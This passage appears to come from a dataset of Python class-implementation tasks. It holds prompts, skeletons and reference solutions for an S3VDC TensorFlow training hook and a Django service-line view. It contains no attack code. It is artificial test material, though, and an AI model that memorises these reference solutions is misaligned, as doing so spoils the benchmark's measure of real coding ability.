skgmm.covariances_.T})\n self.gmm_data = None\n tfl.info('GMM init done at local step {} with momentum factor {}'.format(step, session.run(self.mtm)))\nsession.run(self.utils['incr_gs_step'])", "session = run_context.session\ngs = tf.train.global_step(session, self.utils['global_step'])\nif gs == 0:\n tfl.info('S3VDC training begin at global step 1.')\n session.run(self.utils['incr_gs_step'])\n return\nif gs == self.max_steps - 1:\n tfl.info('S3VDC training end at global step {} with latent annealing factor {}.'.format(gs, session.run(self.vgmm['anneal_factor'])))\ngs_offset = gs - self.gamma_gmm_training_steps\nif gs_offset <= 0:\n if gs_offset <= -1.0 * self.gmm_steps:\n if gs_offset == 1 - self.gamma_gmm_training_steps:\n tfl.info('Gamma training begin at global step {}'.format(gs))\n session.run(self.vgmm['gamma_training_op'])\n else:\n self.skl_init(session, gs_offset)\nelse:\n cyc_step = gs_offset % self.svdc_gmm_finetune_steps\n cyc_id = gs_offset // self.svdc_gmm_finetune_steps + 1\n if cyc_step > 0 and cyc_step <= self.beta_steps:\n if cyc_step == 1:\n tfl.info('PERIOD {}: Beta annealing begin at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n elif cyc_step == self.beta_steps:\n tfl.info('PERIOD {}: Beta annealing end at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n session.run(self.vgmm['svdc_finetune_op'])\n else:\n session.run(self.vgmm['svdc_static_train_op'])"], "bodies_text": "<|body_start_0|>\n self.vae = vae\n self.vgmm = vgmm\n self.hps = hps\n self.utils = utils\n self.is_chief = is_chief\n self.gamma_steps = resolve_simple_number(hps, 'gammaSteps')\n self.gmm_steps = resolve_simple_number(hps, 'gmmSteps')\n self.gamma_gmm_training_steps = self.gamma_steps + self.gmm_steps\n self.beta_steps = resolve_simple_number(hps, 'betaSteps')\n self.static_steps = resolve_simple_number(hps, 'staticSteps')\n self.svdc_gmm_finetune_steps = self.beta_steps + self.static_steps\n self.max_steps = resolve_simple_number(hps, 'maxSteps')\n self.mu = tf.placeholder(dtype=tf.float32)\n self.sigma = tf.placeholder(dtype=tf.float32)\n self.mtm = tf.pow(1.0 - self.vgmm['anneal_factor'], 3)\n self.update_svdc_with_gmm_ops = [tf.assign(self.vgmm['sigma'], (1.0 - self.mtm) * self.vgmm['sigma'] + self.mtm * self.sigma)]\n self.update_svdc_with_kmeans_ops = [tf.assign(self.vgmm['mu'], (1.0 - self.mtm) * self.vgmm['mu'] + self.mtm * self.mu)]\n self.gmm_data = None\n<|end_body_0|>\n\n<|body_start_1|>\n is_final = True if step == 0 else False\n gmm_input_slice = session.run(self.vae['z_mu'])\n if self.gmm_data is None:\n self.gmm_data = gmm_input_slice\n else:\n self.gmm_data = np.concatenate([self.gmm_data, gmm_input_slice], axis=0)\n tfl.info('GMM data accumulation done at local step {} with {} samples.'.format(step, len(self.gmm_data)))\n if is_final:\n np.random.shuffle(self.gmm_data)\n kmeans = cluster.KMeans(n_clusters=self.hps.numCluster, random_state=0)\n kmeans.fit(self.gmm_data)\n session.run(self.update_svdc_with_kmeans_ops, feed_dict={self.mu: kmeans.cluster_centers_.T})\n skgmm = mixture.GaussianMixture(n_components=self.hps.numCluster, covariance_type='diag', max_iter=10000, means_init=kmeans.cluster_centers_, random_state=100)\n skgmm.fit(self.gmm_data)\n session.run(self.update_svdc_with_gmm_ops, feed_dict={self.sigma: skgmm.covariances_.T})\n self.gmm_data = None\n tfl.info('GMM init done at local step {} with momentum factor {}'.format(step, session.run(self.mtm)))\n session.run(self.utils['incr_gs_step'])\n<|end_body_1|>\n\n<|body_start_2|>\n session = run_context.session\n gs = tf.train.global_step(session, self.utils['global_step'])\n if gs == 0:\n tfl.info('S3VDC training begin at global step 1.')\n session.run(self.utils['incr_gs_step'])\n return\n if gs == self.max_steps - 1:\n tfl.info('S3VDC training end at global step {} with latent annealing factor {}.'.format(gs, session.run(self.vgmm['anneal_factor'])))\n gs_offset = gs - self.gamma_gmm_training_steps\n if gs_offset <= 0:\n if gs_offset <= -1.0 * self.gmm_steps:\n if gs_offset == 1 - self.gamma_gmm_training_steps:\n tfl.info('Gamma training begin at global step {}'.format(gs))\n session.run(self.vgmm['gamma_training_op'])\n else:\n self.skl_init(session, gs_offset)\n else:\n cyc_step = gs_offset % self.svdc_gmm_finetune_steps\n cyc_id = gs_offset // self.svdc_gmm_finetune_steps + 1\n if cyc_step > 0 and cyc_step <= self.beta_steps:\n if cyc_step == 1:\n tfl.info('PERIOD {}: Beta annealing begin at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n elif cyc_step == self.beta_steps:\n tfl.info('PERIOD {}: Beta annealing end at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n session.run(self.vgmm['svdc_finetune_op'])\n else:\n session.run(self.vgmm['svdc_static_train_op'])\n<|end_body_2|>\n", "class_docstring": "S3VDC Training flow control", "class_name": "S3VDCHook", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass S3VDCHook:\n \"\"\"S3VDC Training flow control\"\"\"\n\n def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None:\n \"\"\"Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\"\"\"\n <|body_0|>\n\n def skl_init(self, session: tf.Session, step: int) -> None:\n \"\"\"Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.\"\"\"\n <|body_1|>\n\n def before_run(self, run_context: tfe.SessionRunContext) -> None:\n \"\"\"The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.vae = vae\n self.vgmm = vgmm\n self.hps = hps\n self.utils = utils\n self.is_chief = is_chief\n self.gamma_steps = resolve_simple_number(hps, 'gammaSteps')\n self.gmm_steps = resolve_simple_number(hps, 'gmmSteps')\n self.gamma_gmm_training_steps = self.gamma_steps + self.gmm_steps\n self.beta_steps = resolve_simple_number(hps, 'betaSteps')\n self.static_steps = resolve_simple_number(hps, 'staticSteps')\n self.svdc_gmm_finetune_steps = self.beta_steps + self.static_steps\n self.max_steps = resolve_simple_number(hps, 'maxSteps')\n self.mu = tf.placeholder(dtype=tf.float32)\n self.sigma = tf.placeholder(dtype=tf.float32)\n self.mtm = tf.pow(1.0 - self.vgmm['anneal_factor'], 3)\n self.update_svdc_with_gmm_ops = [tf.assign(self.vgmm['sigma'], (1.0 - self.mtm) * self.vgmm['sigma'] + self.mtm * self.sigma)]\n self.update_svdc_with_kmeans_ops = [tf.assign(self.vgmm['mu'], (1.0 - self.mtm) * self.vgmm['mu'] + self.mtm * self.mu)]\n self.gmm_data = None\n<|end_body_0|>\n\n<|body_start_1|>\n is_final = True if step == 0 else False\n gmm_input_slice = session.run(self.vae['z_mu'])\n if self.gmm_data is None:\n self.gmm_data = gmm_input_slice\n else:\n self.gmm_data = np.concatenate([self.gmm_data, gmm_input_slice], axis=0)\n tfl.info('GMM data accumulation done at local step {} with {} samples.'.format(step, len(self.gmm_data)))\n if is_final:\n np.random.shuffle(self.gmm_data)\n kmeans = cluster.KMeans(n_clusters=self.hps.numCluster, random_state=0)\n kmeans.fit(self.gmm_data)\n session.run(self.update_svdc_with_kmeans_ops, feed_dict={self.mu: kmeans.cluster_centers_.T})\n skgmm = mixture.GaussianMixture(n_components=self.hps.numCluster, covariance_type='diag', max_iter=10000, means_init=kmeans.cluster_centers_, random_state=100)\n skgmm.fit(self.gmm_data)\n session.run(self.update_svdc_with_gmm_ops, feed_dict={self.sigma: skgmm.covariances_.T})\n self.gmm_data = None\n tfl.info('GMM init done at local step {} with momentum factor {}'.format(step, session.run(self.mtm)))\n session.run(self.utils['incr_gs_step'])\n<|end_body_1|>\n\n<|body_start_2|>\n session = run_context.session\n gs = tf.train.global_step(session, self.utils['global_step'])\n if gs == 0:\n tfl.info('S3VDC training begin at global step 1.')\n session.run(self.utils['incr_gs_step'])\n return\n if gs == self.max_steps - 1:\n tfl.info('S3VDC training end at global step {} with latent annealing factor {}.'.format(gs, session.run(self.vgmm['anneal_factor'])))\n gs_offset = gs - self.gamma_gmm_training_steps\n if gs_offset <= 0:\n if gs_offset <= -1.0 * self.gmm_steps:\n if gs_offset == 1 - self.gamma_gmm_training_steps:\n tfl.info('Gamma training begin at global step {}'.format(gs))\n session.run(self.vgmm['gamma_training_op'])\n else:\n self.skl_init(session, gs_offset)\n else:\n cyc_step = gs_offset % self.svdc_gmm_finetune_steps\n cyc_id = gs_offset // self.svdc_gmm_finetune_steps + 1\n if cyc_step > 0 and cyc_step <= self.beta_steps:\n if cyc_step == 1:\n tfl.info('PERIOD {}: Beta annealing begin at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n elif cyc_step == self.beta_steps:\n tfl.info('PERIOD {}: Beta annealing end at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n session.run(self.vgmm['svdc_finetune_op'])\n else:\n session.run(self.vgmm['svdc_static_train_op'])\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000309", "length_bytes": 26382, "license_type": "permissive", "methods": [{"docstring": "Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).", "name": "__init__", "signature": "def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None"}, {"docstring": "Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.", "name": "skl_init", "signature": "def skl_init(self, session: tf.Session, step: int) -> None"}, {"docstring": "The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.", "name": "before_run", "signature": "def before_run(self, run_context: tfe.SessionRunContext) -> None"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004469", "prompt": "Implement the Python class `S3VDCHook` described below.\n\nClass description:\nS3VDC Training flow control\n\nMethod signatures and docstrings:\n- def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None: Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\n- def skl_init(self, session: tf.Session, step: int) -> None: Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.\n- def before_run(self, run_context: tfe.SessionRunContext) -> None: The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.", "prompted_full_text": "Implement the Python class `S3VDCHook` described below.\n\nClass description:\nS3VDC Training flow control\n\nMethod signatures and docstrings:\n- def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None: Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\n- def skl_init(self, session: tf.Session, step: int) -> None: Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.\n- def before_run(self, run_context: tfe.SessionRunContext) -> None: The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.\n\n<|skeleton|>\nclass S3VDCHook:\n \"\"\"S3VDC Training flow control\"\"\"\n\n def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None:\n \"\"\"Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\"\"\"\n <|body_0|>\n\n def skl_init(self, session: tf.Session, step: int) -> None:\n \"\"\"Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.\"\"\"\n <|body_1|>\n\n def before_run(self, run_context: tfe.SessionRunContext) -> None:\n \"\"\"The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.vae = vae\n self.vgmm = vgmm\n self.hps = hps\n self.utils = utils\n self.is_chief = is_chief\n self.gamma_steps = resolve_simple_number(hps, 'gammaSteps')\n self.gmm_steps = resolve_simple_number(hps, 'gmmSteps')\n self.gamma_gmm_training_steps = self.gamma_steps + self.gmm_steps\n self.beta_steps = resolve_simple_number(hps, 'betaSteps')\n self.static_steps = resolve_simple_number(hps, 'staticSteps')\n self.svdc_gmm_finetune_steps = self.beta_steps + self.static_steps\n self.max_steps = resolve_simple_number(hps, 'maxSteps')\n self.mu = tf.placeholder(dtype=tf.float32)\n self.sigma = tf.placeholder(dtype=tf.float32)\n self.mtm = tf.pow(1.0 - self.vgmm['anneal_factor'], 3)\n self.update_svdc_with_gmm_ops = [tf.assign(self.vgmm['sigma'], (1.0 - self.mtm) * self.vgmm['sigma'] + self.mtm * self.sigma)]\n self.update_svdc_with_kmeans_ops = [tf.assign(self.vgmm['mu'], (1.0 - self.mtm) * self.vgmm['mu'] + self.mtm * self.mu)]\n self.gmm_data = None\n<|end_body_0|>\n\n<|body_start_1|>\n is_final = True if step == 0 else False\n gmm_input_slice = session.run(self.vae['z_mu'])\n if self.gmm_data is None:\n self.gmm_data = gmm_input_slice\n else:\n self.gmm_data = np.concatenate([self.gmm_data, gmm_input_slice], axis=0)\n tfl.info('GMM data accumulation done at local step {} with {} samples.'.format(step, len(self.gmm_data)))\n if is_final:\n np.random.shuffle(self.gmm_data)\n kmeans = cluster.KMeans(n_clusters=self.hps.numCluster, random_state=0)\n kmeans.fit(self.gmm_data)\n session.run(self.update_svdc_with_kmeans_ops, feed_dict={self.mu: kmeans.cluster_centers_.T})\n skgmm = mixture.GaussianMixture(n_components=self.hps.numCluster, covariance_type='diag', max_iter=10000, means_init=kmeans.cluster_centers_, random_state=100)\n skgmm.fit(self.gmm_data)\n session.run(self.update_svdc_with_gmm_ops, feed_dict={self.sigma: skgmm.covariances_.T})\n self.gmm_data = None\n tfl.info('GMM init done at local step {} with momentum factor {}'.format(step, session.run(self.mtm)))\n session.run(self.utils['incr_gs_step'])\n<|end_body_1|>\n\n<|body_start_2|>\n session = run_context.session\n gs = tf.train.global_step(session, self.utils['global_step'])\n if gs == 0:\n tfl.info('S3VDC training begin at global step 1.')\n session.run(self.utils['incr_gs_step'])\n return\n if gs == self.max_steps - 1:\n tfl.info('S3VDC training end at global step {} with latent annealing factor {}.'.format(gs, session.run(self.vgmm['anneal_factor'])))\n gs_offset = gs - self.gamma_gmm_training_steps\n if gs_offset <= 0:\n if gs_offset <= -1.0 * self.gmm_steps:\n if gs_offset == 1 - self.gamma_gmm_training_steps:\n tfl.info('Gamma training begin at global step {}'.format(gs))\n session.run(self.vgmm['gamma_training_op'])\n else:\n self.skl_init(session, gs_offset)\n else:\n cyc_step = gs_offset % self.svdc_gmm_finetune_steps\n cyc_id = gs_offset // self.svdc_gmm_finetune_steps + 1\n if cyc_step > 0 and cyc_step <= self.beta_steps:\n if cyc_step == 1:\n tfl.info('PERIOD {}: Beta annealing begin at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n elif cyc_step == self.beta_steps:\n tfl.info('PERIOD {}: Beta annealing end at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n session.run(self.vgmm['svdc_finetune_op'])\n else:\n session.run(self.vgmm['svdc_static_train_op'])\n<|end_body_2|>\n", "revision_id": "baa6689a6344f417758d4d8b4e6c6e966a510b32", "skeleton": "<|skeleton|>\nclass S3VDCHook:\n \"\"\"S3VDC Training flow control\"\"\"\n\n def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None:\n \"\"\"Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\"\"\"\n <|body_0|>\n\n def skl_init(self, session: tf.Session, step: int) -> None:\n \"\"\"Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.\"\"\"\n <|body_1|>\n\n def before_run(self, run_context: tfe.SessionRunContext) -> None:\n \"\"\"The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class S3VDCHook:\n \"\"\"S3VDC Training flow control\"\"\"\n\n def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None:\n \"\"\"Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\"\"\"\n self.vae = vae\n self.vgmm = vgmm\n self.hps = hps\n self.utils = utils\n self.is_chief = is_chief\n self.gamma_steps = resolve_simple_number(hps, 'gammaSteps')\n self.gmm_steps = resolve_simple_number(hps, 'gmmSteps')\n self.gamma_gmm_training_steps = self.gamma_steps + self.gmm_steps\n self.beta_steps = resolve_simple_number(hps, 'betaSteps')\n self.static_steps = resolve_simple_number(hps, 'staticSteps')\n self.svdc_gmm_finetune_steps = self.beta_steps + self.static_steps\n self.max_steps = resolve_simple_number(hps, 'maxSteps')\n self.mu = tf.placeholder(dtype=tf.float32)\n self.sigma = tf.placeholder(dtype=tf.float32)\n self.mtm = tf.pow(1.0 - self.vgmm['anneal_factor'], 3)\n self.update_svdc_with_gmm_ops = [tf.assign(self.vgmm['sigma'], (1.0 - self.mtm) * self.vgmm['sigma'] + self.mtm * self.sigma)]\n self.update_svdc_with_kmeans_ops = [tf.assign(self.vgmm['mu'], (1.0 - self.mtm) * self.vgmm['mu'] + self.mtm * self.mu)]\n self.gmm_data = None\n\n def skl_init(self, session: tf.Session, step: int) -> None:\n \"\"\"Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.\"\"\"\n is_final = True if step == 0 else False\n gmm_input_slice = session.run(self.vae['z_mu'])\n if self.gmm_data is None:\n self.gmm_data = gmm_input_slice\n else:\n self.gmm_data = np.concatenate([self.gmm_data, gmm_input_slice], axis=0)\n tfl.info('GMM data accumulation done at local step {} with {} samples.'.format(step, len(self.gmm_data)))\n if is_final:\n np.random.shuffle(self.gmm_data)\n kmeans = cluster.KMeans(n_clusters=self.hps.numCluster, random_state=0)\n kmeans.fit(self.gmm_data)\n session.run(self.update_svdc_with_kmeans_ops, feed_dict={self.mu: kmeans.cluster_centers_.T})\n skgmm = mixture.GaussianMixture(n_components=self.hps.numCluster, covariance_type='diag', max_iter=10000, means_init=kmeans.cluster_centers_, random_state=100)\n skgmm.fit(self.gmm_data)\n session.run(self.update_svdc_with_gmm_ops, feed_dict={self.sigma: skgmm.covariances_.T})\n self.gmm_data = None\n tfl.info('GMM init done at local step {} with momentum factor {}'.format(step, session.run(self.mtm)))\n session.run(self.utils['incr_gs_step'])\n\n def before_run(self, run_context: tfe.SessionRunContext) -> None:\n \"\"\"The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.\"\"\"\n session = run_context.session\n gs = tf.train.global_step(session, self.utils['global_step'])\n if gs == 0:\n tfl.info('S3VDC training begin at global step 1.')\n session.run(self.utils['incr_gs_step'])\n return\n if gs == self.max_steps - 1:\n tfl.info('S3VDC training end at global step {} with latent annealing factor {}.'.format(gs, session.run(self.vgmm['anneal_factor'])))\n gs_offset = gs - self.gamma_gmm_training_steps\n if gs_offset <= 0:\n if gs_offset <= -1.0 * self.gmm_steps:\n if gs_offset == 1 - self.gamma_gmm_training_steps:\n tfl.info('Gamma training begin at global step {}'.format(gs))\n session.run(self.vgmm['gamma_training_op'])\n else:\n self.skl_init(session, gs_offset)\n else:\n cyc_step = gs_offset % self.svdc_gmm_finetune_steps\n cyc_id = gs_offset // self.svdc_gmm_finetune_steps + 1\n if cyc_step > 0 and cyc_step <= self.beta_steps:\n if cyc_step == 1:\n tfl.info('PERIOD {}: Beta annealing begin at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n elif cyc_step == self.beta_steps:\n tfl.info('PERIOD {}: Beta annealing end at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n session.run(self.vgmm['svdc_finetune_op'])\n else:\n session.run(self.vgmm['svdc_static_train_op'])\n", "source": "the_stack_v2_python_sparse", "source_path": "lib/user_custom_model.py", "source_repo": "tmaone/s3vdc", "split": "test", "star_events_count": 0} {"blob_id": "4f51ba70cd17e7ea066e3b74500aadc79888c259", "bodies": ["form = ServiceForm()\nservice_obj = models.Services.objects.all().order_by('-id')\nowner_obj = models.User.objects.values('id', 'username')\nreturn render(request, 'host/service_line.html', {'form': form, 'service_obj': service_obj, 'owner_obj': owner_obj})", "username = request.session.get('user_info')['username']\nresponse = {'status': True, 'data': None, 'msg': None}\nprint(request.POST)\nprint(request.POST.get('owner_id'))\nform = ServiceForm(data=request.POST)\nif form.is_valid():\n print(form.cleaned_data)\n owner_id_list = form.cleaned_data.pop('owner_id')\n obj = models.Services.objects.create(**form.cleaned_data)\n obj.owner.add(*owner_id_list)\n log.logger.info('username:{},Add service line info: name:{},idc_id:{}'.format(username, form.cleaned_data['name'], form.cleaned_data['idc_id']))\nelse:\n print(form.errors)\n response['status'] = False\n response['msg'] = form.errors\nreturn HttpResponse(json.dumps(response))"], "bodies_text": "<|body_start_0|>\n form = ServiceForm()\n service_obj = models.Services.objects.all().order_by('-id')\n owner_obj = models.User.objects.values('id', 'username')\n return render(request, 'host/service_line.html', {'form': form, 'service_obj': service_obj, 'owner_obj': owner_obj})\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.session.get('user_info')['username']\n response = {'status': True, 'data': None, 'msg': None}\n print(request.POST)\n print(request.POST.get('owner_id'))\n form = ServiceForm(data=request.POST)\n if form.is_valid():\n print(form.cleaned_data)\n owner_id_list = form.cleaned_data.pop('owner_id')\n obj = models.Services.objects.create(**form.cleaned_data)\n obj.owner.add(*owner_id_list)\n log.logger.info('username:{},Add service line info: name:{},idc_id:{}'.format(username, form.cleaned_data['name'], form.cleaned_data['idc_id']))\n else:\n print(form.errors)\n response['status'] = False\n response['msg'] = form.errors\n return HttpResponse(json.dumps(response))\n<|end_body_1|>\n", "class_docstring": "业务线视图函数", "class_name": "ServiceLineView", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ServiceLineView:\n \"\"\"业务线视图函数\"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"展示业务线信息 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_0|>\n\n def post(self, request, *args, **kwargs):\n \"\"\"新建业务线 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form = ServiceForm()\n service_obj = models.Services.objects.all().order_by('-id')\n owner_obj = models.User.objects.values('id', 'username')\n return render(request, 'host/service_line.html', {'form': form, 'service_obj': service_obj, 'owner_obj': owner_obj})\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.session.get('user_info')['username']\n response = {'status': True, 'data': None, 'msg': None}\n print(request.POST)\n print(request.POST.get('owner_id'))\n form = ServiceForm(data=request.POST)\n if form.is_valid():\n print(form.cleaned_data)\n owner_id_list = form.cleaned_data.pop('owner_id')\n obj = models.Services.objects.create(**form.cleaned_data)\n obj.owner.add(*owner_id_list)\n log.logger.info('username:{},Add service line info: name:{},idc_id:{}'.format(username, form.cleaned_data['name'], form.cleaned_data['idc_id']))\n else:\n print(form.errors)\n response['status'] = False\n response['msg'] = form.errors\n return HttpResponse(json.dumps(response))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000310", "length_bytes": 7092, "license_type": "no_license", "methods": [{"docstring": "展示业务线信息 :param request: :param args: :param kwargs: :return:", "name": "get", "signature": "def get(self, request, *args, **kwargs)"}, {"docstring": "新建业务线 :param request: :param args: :param kwargs: :return:", "name": "post", "signature": "def post(self, request, *args, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002626", "prompt": "Implement the Python class `ServiceLineView` described below.\n\nClass description:\n业务线视图函数\n\nMethod signatures and docstrings:\n- def get(self, request, *args, **kwargs): 展示业务线信息 :param request: :param args: :param kwargs: :return:\n- def post(self, request, *args, **kwargs): 新建业务线 :param request: :param args: :param kwargs: :return:", "prompted_full_text": "Implement the Python class `ServiceLineView` described below.\n\nClass description:\n业务线视图函数\n\nMethod signatures and docstrings:\n- def get(self, request, *args, **kwargs): 展示业务线信息 :param request: :param args: :param kwargs: :return:\n- def post(self, request, *args, **kwargs): 新建业务线 :param request: :param args: :param kwargs: :return:\n\n<|skeleton|>\nclass ServiceLineView:\n \"\"\"业务线视图函数\"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"展示业务线信息 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_0|>\n\n def post(self, request, *args, **kwargs):\n \"\"\"新建业务线 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form = ServiceForm()\n service_obj = models.Services.objects.all().order_by('-id')\n owner_obj = models.User.objects.values('id', 'username')\n return render(request, 'host/service_line.html', {'form': form, 'service_obj': service_obj, 'owner_obj': owner_obj})\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.session.get('user_info')['username']\n response = {'status': True, 'data': None, 'msg': None}\n print(request.POST)\n print(request.POST.get('owner_id'))\n form = ServiceForm(data=request.POST)\n if form.is_valid():\n print(form.cleaned_data)\n owner_id_list = form.cleaned_data.pop('owner_id')\n obj = models.Services.objects.create(**form.cleaned_data)\n obj.owner.add(*owner_id_list)\n log.logger.info('username:{},Add service line info: name:{},idc_id:{}'.format(username, form.cleaned_data['name'], form.cleaned_data['idc_id']))\n else:\n print(form.errors)\n response['status'] = False\n response['msg'] = form.errors\n return HttpResponse(json.dumps(response))\n<|end_body_1|>\n", "revision_id": "5ead7c54c73fc3a1ba02cd77d675997cf5c36e12", "skeleton": "<|skeleton|>\nclass ServiceLineView:\n \"\"\"业务线视图函数\"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"展示业务线信息 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_0|>\n\n def post(self, request, *args, **kwargs):\n \"\"\"新建业务线 :param request: :param args: :param kwargs: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ServiceLineView:\n \"\"\"业务线视图函数\"\"\"\n\n def get(self, request, *args, **kwargs):\n \"\"\"展示业务线信息 :param request: :param args: :param kwargs: :return:\"\"\"\n form = ServiceForm()\n service_obj = models.Services.objects.all().order_by('-id')\n owner_obj = models.User.objects.values('id', 'username')\n return render(request, 'host/service_line.html', {'form': form, 'service_obj': service_obj, 'owner_obj': owner_obj})\n\n def post(self, request, *args, **kwargs):\n \"\"\"新建业务线 :param request: :param args: :param kwargs: :return:\"\"\"\n username = request.session.get('user_info')['username']\n response = {'status': True, 'data': None, 'msg': None}\n print(request.POST)\n print(request.POST.get('owner_id'))\n form = ServiceForm(data=request.POST)\n if form.is_valid():\n print(form.cleaned_data)\n owner_id_list = form.cleaned_data.pop('owner_id')\n obj = models.Services.objects.create(**form.cleaned_data)\n obj.owner.add(*owner_id_list)\n log.logger.info('username:{},Add service line info: name:{},idc_id:{}'.format(username, form.cleaned_data['name'], form.cleaned_data['idc_id']))\n else:\n print(form.errors)\n response['status'] = False\n response['msg'] = form.errors\n return HttpResponse(json.dumps(response))\n", "source": "the_stack_v2_python_sparse", "source_path": "warship/host/views/service.py", "source_repo": "shuke163/learnpy", "split": "test", "star_events_count": 1} {"blob_id": "adf2414bf67dd17b494b72bb24106ec1192b8ae6", "bodies": ["self.compare_angle = None\nself._centroid_vectors = None\nself.ref_curve = self._calc_dist_curve(training_mask)\nself._ref_angle = np.arctan2(*self._centroid_vectors[0])", "input_curve = self._calc_dist_curve(query_mask)\ncost_landscape = np.abs(self.ref_curve[:, None] - input_curve[None, :])\nn_eval = min(500, self.ref_curve.size, 